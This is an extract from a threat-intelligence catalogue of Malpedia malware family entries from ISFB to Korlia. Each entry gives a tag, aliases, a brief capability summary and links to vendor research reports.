The tag is: misp-galaxy:malpedia="ISFB"

ISFB is also known as:

  • Gozi ISFB

  • IAP

  • Pandemyia

Table 3758. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb

https://www.cyberbit.com/new-ursnif-malware-variant/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/

https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245

https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/

https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://lokalhost.pl/gozi_tree.txt

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.youtube.com/watch?v=jlc7Ahp8Iqg

https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html

https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware

https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://www.youtube.com/watch?v=KvOpNznu_3w

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/

https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html

https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/

https://github.com/mlodic/ursnif_beacon_decryptor

https://twitter.com/JAMESWT_MHT/status/1712783250446328114?t=iLKXzsZuS1TTa0i9sZFkQA&s=19

http://benkow.cc/DreambotSAS19.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://blog.group-ib.com/gozi-latest-ttps

https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15

https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks

https://blog.yoroi.company/research/ursnif-long-live-the-steganography/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/

https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/

https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/

https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html

https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.bridewell.com/insights/news/detail/hunting-for-ursnif

http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html

https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://www.tgsoft.it/files/report/download.asp?id=568531345

https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0

https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion

https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/

https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware

https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072

https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/

https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/

https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef

ISR Stealer

ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.

Incredibly, it uses an hard-coded user agent string: HardCore Software For : Public

The tag is: misp-galaxy:malpedia="ISR Stealer"

ISR Stealer is also known as:

Table 3763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer

https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/

IXWare

The tag is: misp-galaxy:malpedia="IXWare"

IXWare is also known as:

Table 3765. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware

https://fr3d.hk/blog/ixware-kids-will-be-skids

Jackal

According to Kaspersky Labs, this malware tool set has been used by APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia with espionage. It consists of multiple components and is written in .NET.

The tag is: misp-galaxy:malpedia="Jackal"

Jackal is also known as:

Table 3766. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jackal

https://securelist.com/goldenjackal-apt-group/109677/

JackPOS

The tag is: misp-galaxy:malpedia="JackPOS"

JackPOS is also known as:

Table 3767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos

Jager Decryptor

The tag is: misp-galaxy:malpedia="Jager Decryptor"

Jager Decryptor is also known as:

Table 3769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor

JanelaRAT

According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. Its focus is set on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat.

The tag is: misp-galaxy:malpedia="JanelaRAT"

JanelaRAT is also known as:

Table 3771. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.janela_rat

https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech

jason

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.

The tag is: misp-galaxy:malpedia="jason"

jason is also known as:

Table 3773. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jason

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://marcoramilli.com/2019/06/06/apt34-jason-project/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://twitter.com/P3pperP0tts/status/1135503765287657472

JCry

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="JCry"

JCry is also known as:

Table 3775. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry

https://twitter.com/IdoNaor1/status/1101936940297924608

https://twitter.com/0xffff0800/status/1102078898320302080

Jeno

Ransomware.

The tag is: misp-galaxy:malpedia="Jeno"

Jeno is also known as:

  • Jest

  • Valeria

Table 3776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno

https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html

JessieConTea

JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.

The malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.

JessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol ".?AVCHttpConn@@", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.

The tag is: misp-galaxy:malpedia="JessieConTea"

JessieConTea is also known as:

Table 3777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea

https://securelist.com/lazarus-trojanized-defi-app/106195/

https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html

https://asec.ahnlab.com/en/57685/

JhoneRAT

Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

The tag is: misp-galaxy:malpedia="JhoneRAT"

JhoneRAT is also known as:

Table 3778. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://blog.talosintelligence.com/2020/01/jhonerat.html

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

Jigsaw

According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.

The tag is: misp-galaxy:malpedia="Jigsaw"

Jigsaw is also known as:

Table 3779. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw

https://threatmon.io/solving-the-puzzle-reversing-the-new-stealer-jigsaw/

Jimmy

The tag is: misp-galaxy:malpedia="Jimmy"

Jimmy is also known as:

Table 3780. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy

https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/

JLORAT

The tag is: misp-galaxy:malpedia="JLORAT"

JLORAT is also known as:

Table 3781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Joao

The tag is: misp-galaxy:malpedia="Joao"

Joao is also known as:

Table 3783. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.joao

https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/

JQJSNICKER

The tag is: misp-galaxy:malpedia="JQJSNICKER"

JQJSNICKER is also known as:

Table 3786. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker

http://marcmaiffret.com/vault7/

JUMPALL

According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.

The tag is: misp-galaxy:malpedia="JUMPALL"

JUMPALL is also known as:

Table 3791. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall

https://content.fireeye.com/apt-41/rpt-apt41/

Kami

A Telegram bot with browser stealing capabilities, written using the .NET framework.

The tag is: misp-galaxy:malpedia="Kami"

Kami is also known as:

Table 3794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kami

https://twitter.com/jaydinbas/status/1604918636422070289

Kardon Loader

According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.

The tag is: misp-galaxy:malpedia="Kardon Loader"

Kardon Loader is also known as:

Table 3796. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader

https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab

https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/

Karius

According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.

It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.

Communication with the c2 are in json format and encrypted with RC4 with a hardcoded key.

In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.

The tag is: misp-galaxy:malpedia="Karius"

Karius is also known as:

Table 3797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.karius

https://research.checkpoint.com/banking-trojans-development/

https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

KazyLoader

According to Karsten Hahn, a straightforward loader that runs assemblies from images.

The tag is: misp-galaxy:malpedia="KazyLoader"

KazyLoader is also known as:

Table 3802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kazyloader

https://twitter.com/struppigel/status/1501105224819392516

KDC Sponge

The tag is: misp-galaxy:malpedia="KDC Sponge"

KDC Sponge is also known as:

Table 3803. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge

https://us-cert.cisa.gov/ncas/alerts/aa21-336a

KEKW

Ransomware.

The tag is: misp-galaxy:malpedia="KEKW"

KEKW is also known as:

  • KEKW-Locker

Table 3805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw

https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html

Keona

The tag is: misp-galaxy:malpedia="Keona"

Keona is also known as:

Table 3807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.keona

https://twitter.com/3xp0rtblog/status/1536704209760010241

Ketrum

Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.

The tag is: misp-galaxy:malpedia="Ketrum"

Ketrum is also known as:

Table 3810. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum

https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

KHRAT

According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:malpedia="KHRAT"

KHRAT is also known as:

Table 3817. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat

https://unit42.paloaltonetworks.com/atoms/rancortaurus/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/

https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/

https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor

Kikothac

The tag is: misp-galaxy:malpedia="Kikothac"

Kikothac is also known as:

Table 3818. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac

https://www.group-ib.com/resources/threat-research/silence.html

KillDisk

KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them.

The tag is: misp-galaxy:malpedia="KillDisk"

KillDisk is also known as:

Table 3820. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://attack.mitre.org/groups/G0034

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://www.youtube.com/watch?v=mrTdSdMMgnk

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks

KilllSomeOne

The tag is: misp-galaxy:malpedia="KilllSomeOne"

KilllSomeOne is also known as:

Table 3821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.killsomeone

https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/

Kimsuky

The tag is: misp-galaxy:malpedia="Kimsuky"

Kimsuky is also known as:

Table 3823. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky

https://blog.alyac.co.kr/2347

https://blog.prevailion.com/2019/09/autumn-aperture-report.html

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign

https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf

https://threatmon.io/unraveling-the-layers-analysis-of-kimsukys-multi-staged-cyberattack/

https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9

https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html

https://asec.ahnlab.com/en/37396/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/

https://asec.ahnlab.com/en/30532/

https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://metaswan.github.io/posts/Malware-Kimsuky-group’s-resume-impersonation-malware

https://asec.ahnlab.com/en/53046/

Klackring

Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.

The tag is: misp-galaxy:malpedia="Klackring"

Klackring is also known as:

Table 3827. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring

https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

KleptoParasite Stealer

KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.

PDB-strings suggest a relationship to JogLog v6 and v7.

The tag is: misp-galaxy:malpedia="KleptoParasite Stealer"

KleptoParasite Stealer is also known as:

  • Joglog

  • Parasite

Table 3828. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer

KlingonRAT

The tag is: misp-galaxy:malpedia="KlingonRAT"

KlingonRAT is also known as:

Table 3829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.klingon_rat

https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/

Knot

Ransomware.

The tag is: misp-galaxy:malpedia="Knot"

Knot is also known as:

Table 3831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.knot

https://twitter.com/malwrhunterteam/status/1345313324825780226

Koadic

Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.

The tag is: misp-galaxy:malpedia="Koadic"

Koadic is also known as:

Table 3832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://blog.tofile.dev/2020/11/28/koadic_jarm.html

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

http://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.secureworks.com/research/threat-profiles/gold-drake

https://github.com/zerosum0x0/koadic

https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

KoiVM

A loader written in .NET.

The tag is: misp-galaxy:malpedia="KoiVM"

KoiVM is also known as:

Table 3833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.koivm

https://labs.k7computing.com/index.php/koivm-loader-resurfaces-with-a-bang/

KokoKrypt

The tag is: misp-galaxy:malpedia="KokoKrypt"

KokoKrypt is also known as:

Table 3834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt

https://twitter.com/struppigel/status/812726545173401600

KOMPROGO

KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.

The tag is: misp-galaxy:malpedia="KOMPROGO"

KOMPROGO is also known as:

  • Splinter RAT

Table 3835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo

https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf

https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Konni

Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.

The tag is: misp-galaxy:malpedia="Konni"

Konni is also known as:

Table 3836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.konni

https://wezard4u.tistory.com/6693

https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/

https://threatmon.io/the-konni-apt-chronicle-tracing-their-intelligence-driven-attack-chain/

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://blog.alyac.co.kr/2474

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

https://us-cert.cisa.gov/ncas/alerts/aa20-227a

https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant

https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf

https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html

http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html

https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf

https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/

https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/

https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

Korlia

The tag is: misp-galaxy:malpedia="Korlia"

Korlia is also known as:

  • Bisonal

Table 3838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/

https://www.secureworks.com/research/threat-profiles/bronze-huntley

https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf

https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://asec.ahnlab.com/1298

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf

https://securitykitten.github.io/2014/11/25/curious-korlia.html

